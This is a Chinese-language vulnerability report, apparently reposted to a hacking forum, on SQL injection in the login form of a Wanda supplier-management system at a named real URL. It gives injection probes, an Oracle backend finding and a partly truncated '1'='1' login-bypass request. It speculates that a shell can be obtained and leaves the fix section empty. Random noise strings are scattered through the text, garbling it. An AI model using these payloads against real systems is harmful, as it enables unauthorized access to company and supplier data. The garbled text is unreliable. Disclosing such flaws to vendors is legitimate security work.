万达供应商系统SQL注射漏洞

admin

简要描述：万达某分站sql注入。敏感信息泄露。
详细说明：
万达scm系统登陆框sql注入。

" P, L! g( ]5 I: n# c6 dhttp://www.vans-china.cn/LoginUser?USERNO=%27&PWD=%27
" m& L+ M2 j0 A$ s

9 ?1 t0 H: w9 U6 Y) B/ k500错误。
4 T5 n% Y% L7 c! M# S1 |! P3 s
# g5 w# W* ]- s8 r4 Y# I6 b用户名随便输，提示没有该用户;USERNO=%27 and 1=1 --&PWD=%27 and 1=1 --提示密码错误。
http://www.myhack58.com/Article/UploadPic/2013-3/201332317223677547.png
+ l, |0 @" x6 [- ^# \( i截图有一点问题，用户名，和密码输入' and 1=1 --可以得到相同的提示，可自测。）
; a& k8 D2 A/ n: r( }经过分析，登陆验证的过程应该是：
% ^- h! x. K3 l# q
' r" a- \* y2 z- S$ g/ z9 H4 i取用户名查询数据库，有该用户，再用该用户密码和输入的密码进行比对，相同则登陆成功。
http://www.myhack58.com/Article/UploadPic/2013-3/201332317233886589.png
% f2 _, o) m" P: K9 V9 f
oracle数据库，存在注入点。@大连万达，你怎么看？
, ^5 \. n" x( N$ d6 {% Nhttp://www.myhack58.com/Article/UploadPic/2013-3/201332317241777393.png

. F) b# |7 Y& y0 @0 ?3 x/ v系统里有万达的供应商资料什么的,提交数据的地方随便输入'，提交500错误。没深入。目测可shell。
# Y& U9 h) M& r5 h8 O( }" d漏洞证明：
7 b& `0 P& @9 T万达scm系统登陆框sql注入。
- c0 X+ v1 M" B0 w% j
: X2 {5 z+ o  K  Q6 Z7 ]http://www.vans-china.cn/LoginUser?USERNO=%27&PWD=%27
  N8 L! v5 q8 T& y
( w( f6 F1 n. [. a) E
500错误。
5 D! @) l$ I7 N& T3 M2 b
用户名随便输，提示没有该用户;USERNO=%27 and 1=1 --&PWD=%27 and 1=1 --提示密码错误。
0 R6 V  X  |8 Mhttp://www.myhack58.com/Article/UploadPic/2013-3/20133231728465694.png
0 ?( I( O8 m1 ]& E6 t

（截图有一点问题）
' T- F" d# w- g) @  ?
怎么饶都饶不过去；经过分析，登陆验证的过程应该是：

4 }! P. w: O5 ^7 j% S% z取用户名查询数据库，有该用户，再用该用户密码和输入的密码进行比对，相同则登陆成功。
0 Z" ~% Z+ Q. R* [" a
* g" e+ a6 i+ b; ~" p绕过：
http://www.vans-china.cn/LoginUs ... 1%27=%271&PWD=1
$ E* ~% g' Y& a# z4 X6 R7 c
/ {  F4 R$ a2 j/ M1 J
oracle数据库，存在注入点。@大连万达，你怎么看？
' r. G  Z7 l2 o- V- T​系统里有万达的供应商资料什么的，有发布公告，没深入。目测可shell。
  M7 L1 j* {- F
& D4 X% r/ c' w, H, P3 i1 m# a+ S' v3 q2 i修复方案：
* u0 v: T5 t! x$ N) D: A。。。


# U7 z% o2 `! Y& M: @# _厂商已经确认
% v/ Z# q. b6 l5 R/ ~& S9 V8 f" x
( Y% m  K: v  M7 C( O5 u4 O/ ^[/td][/tr]
[/table]